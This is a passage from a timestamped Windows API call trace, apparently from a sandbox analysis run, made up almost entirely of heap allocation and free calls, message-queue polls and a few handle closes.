returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.523] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0254.523] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0254.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.523] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0254.524] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.524] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.524] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.525] FreeLibrary (hLibModule=0x74d40000) returned 1 [0254.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.526] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.526] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.526] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0254.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0254.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0254.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0254.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.528] CloseHandle (hObject=0x1f8) returned 1 [0254.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0254.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0254.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0254.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0254.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.531] CloseHandle (hObject=0x294) returned 1 [0254.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0254.533] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0254.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0254.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0254.537] HeapFree (in: 